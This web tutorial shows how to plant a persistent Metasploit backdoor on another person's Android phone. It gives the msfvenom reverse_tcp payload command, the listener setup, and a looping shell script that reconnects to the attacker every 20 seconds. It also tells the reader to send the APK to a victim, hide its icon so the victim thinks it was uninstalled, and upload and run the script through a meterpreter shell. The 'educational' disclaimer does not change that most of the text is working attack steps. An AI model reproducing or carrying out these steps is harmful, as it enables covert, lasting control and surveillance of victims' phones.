How to Create a Persistent Android Backdoor for Metasploit with Shell Script

0
1231
how to create persistent backdoor for android in metasploit
how to create persistent backdoor for android in metasploit

Warning : This tutorial is for educational purposes only. Neither the author, nor the website is responsible for what the visitor does with the below content.

Post exploitation is a most prominent step in Ethical Hacking. Whenever a hacker get’s access to any device, The next step he does is maintaining access.

Back doors are used to maintain access and they provide constant connection even if the device is rebooted or the connection is reset.

Especially in Android, installing backdoor is a critical job because backdoor varies for each and every payload application.

First of all, For Android payload application can be created with two types. Either as a raw payload apk (has nothing inside it) or binding the payload with Legit Android Applications ( like Facebook, Whatsapp etc)

The problem with these payload applications are that, once the connection is terminated and tries to reconnect, the payload has to be executed once again.

But this can be eliminated by installing a backdoor which can provide persistent connection to the attacker by making a constant refresh in the connection for the given time intervals.

But the problem here is that the backdoor files should be manually rewritten for every payload application (the legit application to which the payload is bound).

How to Create a Persistent Android Backdoor in Metasploit :

Im going to perform my attack on WAN. So, I will be using OpenVPN and portmap to ahck on WAN without port forwarding.

Also read : How to hack on WAN without Port Forwarding using Portmap.io and OpenVPN

vpn initialization
vpn initialization

To create a msfvenom payload for Android, type
” msfvenom -p android/meterpreter/reverse_tcp LHOST=<your Ip address> LPORT=<Port Number> R > /Desktop/Payload.apk

payload creation
payload creation

This will generate a Raw Msfvenom payload apk. This app can be renamed to any name but while installing, it will get Installed as “Main Activity”. Even this name can be changed by decompiling the app manually. But if you change, the backdoor file should also be changed.

Now, create a listener in your Terminal. Follow the below commands to create a listener.
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <IP Address>
set LPORT <port number>
exploit

meterpreter
meterpreter

To create a backdoor file for Main Activity apk, copy paste the following contents in “Gedit” or any other text editor and save it as something.sh. Remember that the .sh extension is important.

# !/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

android persistent backdoor
android persistent backdoor

Copy paste the content exactly as mentioned above in your .sh file. The value 20 refers to 20 seconds which means that the victim smartphone will attempt to connect to the attacker for every 20 seconds ever after several reboots.

com.metasploit.stage/. MainActivity must be replaced with com. Whatsapp if you’ve bound your payload with WhatsApp.

Similarly, the com.bla bla bla line will change according to the payload app you’ve created. To find this com.random-website for your payload which you’ve bound with a legitimate app, browse the legit app in Playstore and choose the share option and copy the link.

For example, the link for Whatsapp looks like
https://play.google.com/store/apps/details?id=com.whatsapp
From the id parameter, we can find the com.website-name.

Now send payload apk to your victim and let him install the application.

After installation, when he taps ‘Open’ the application will not get opened, instead you’ll get a meterpreter opened in your listener. Now, he can find that there’s nothing inside the app.

Before finds something fishy is going around his phone, type ‘hide_app_icon’ and hit enter. Now, the application will get disappeared from his Home screen as well as in his drawer menu.

Now, the victim will believe that the App must have got uninstalled automatically. Most of the user wont go to settings<installed apps to check whether the Application is still in their mobile or not.

Now, after getting a meterpreter, you’ll be currently working in a special directory where the Payload application’s data are stored.

Type “Upload Desktop/something.sh” and hit enter. This uploads your backdoor file into victim’s android mobile. In my case, I have named my backdoor as door.sh. So I have typed “upload Desktop/door.sh”

backdoor upload
backdoor upload

After successful uploading, type “Shell” to open a interactive shell in the victim machines. After getting into the shell, type “ls” to list the available files in the working directory. You can find your “something.sh” file which you’ve uploaded.

Now to execute the backdoor files, type “sh something.sh” in the shell and wait for few seconds. After getting executed, press “ctrl+c” and type ‘exit’ to exit the shell.

backdoor execution
backdoor execution

That’s it. Now, the backdoor has been successfully installed and the victim’s smartphone will connect back to the attacker for every 20 seconds. The connection will be persistent even if the victim restarts his smart phone.

Now, to test your persistence, exit the meterpreter and type “Exploit” again. You’ll get meterpreter session opened automatically without the user clicking on the Payload app’s icon.

meterpreter opened again
meterpreter opened again

If you have merged your payload with any other application, then after executing the backdoor, the application keeps popping up after certain interval. This is the main demerit we face when we bind other our msfvenom payload with other applications.

The only possibility through which the the attacker can loose connection is when the victim uninstalls the Payload application from Settings< Installed Apps < Main Activity < Uninstall

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.